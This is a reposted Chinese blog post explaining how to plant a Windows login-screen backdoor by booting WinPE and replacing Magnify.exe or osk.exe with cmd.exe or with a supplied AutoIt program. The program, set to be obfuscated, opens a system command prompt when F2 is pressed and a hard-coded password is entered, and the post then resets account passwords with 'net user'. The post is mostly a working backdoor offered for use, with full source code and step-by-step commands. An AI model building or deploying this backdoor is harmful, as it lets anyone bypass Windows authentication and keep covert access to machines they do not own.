搭建win系统登录密码后门

最新推荐文章于 2025-08-11 16:30:34 发布

转载最新推荐文章于 2025-08-11 16:30:34 发布 · 147 阅读

CC 4.0 BY-SA版权

原文链接：http://blog.51cto.com/guojimail/1159529

文章标签：

本文介绍如何通过WinPE环境部署后门程序，实现Windows系统登录密码的修改。具体步骤包括替换系统文件、启动PE系统、利用命令行工具进行密码重置等。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

这其实很简单就是利用下面这个原理，但是这个操作需要你能进入winpe。如果你有需要可以部署一个后门。

使用方法：

C:\Windows\System32\Magnify.exe 更名 C:\Windows\System32\Magnifyk.exe

这个操作需要先在文件属性安全高级所有人中把程序所有者换成administrator，更改后可以换回来。

然后编辑文件Magnify.exe放在C:\Windows\System32\目录下

然后再开机时按辅助程序再按放大镜应用

然后按 F2 输入密码 13249

然后按提示输入命令就可以了

原理：

1、从U盘或者光盘的PE启动，进入PE系统，找到windows目录下的system32文件夹，备份cmd.exe和osk.exe两个文件到别的盘。
2、将osk.exe文件删除或者改名，将cmd.exe文件改名为osk.exe
3、从硬盘引导系统，到登录界面，在左下角打开屏幕键盘，由于我们在第二部进行了处理所以会自动调用cmd命令行。
4、输入命令：net user username newpassword 例如我的用户名huaner要改系统开机登录密码为123456的话命令内容是：
net user huaner 123456
最后等待提示完成后即可用新的开机密码登录windows7系统了，推荐以后将cmd.exe和osk.exe改回，不然以后调用的时候会出问题，如果不使用屏幕键盘的话可以不改回oks.exe，不过以后谁都能轻易破解修改掉你的windows7开机登录密码，毕竟我们的操作还要用一次PE呢。

AU3源代码

#region ;**** 参数创建于 ACNWrapper_GUI ****
#PRE_UseUpx=n
#PRE_Run_Obfuscator=y
#endregion ;**** 参数创建于 ACNWrapper_GUI ****
HotKeySet("{F2}", "pass")
Run(@ScriptDir & "\Magnifyk.exe")
While 1
Sleep(500)
WEnd
Func pass()
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <WindowsConstants.au3>
#region ### START Koda GUI section ### Form=
$Form1_1 = GUICreate("", 246, 74, 382, 317)
$Input1 = GUICtrlCreateInput("", 8, 8, 225, 21, BitOR($GUI_SS_DEFAULT_INPUT, $ES_PASSWORD))
$Button1 = GUICtrlCreateButton("", 8, 40, 227, 25)
GUISetState(@SW_SHOW)
#endregion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $Button1
If GUICtrlRead($Input1) = 13249 Then
MsgBox(0, "将密码改为123456", "net user administrator 123456")
Run(@ScriptDir & "\cmd.exe")
EndIf
EndSwitch
WEnd
EndFunc ;==>pass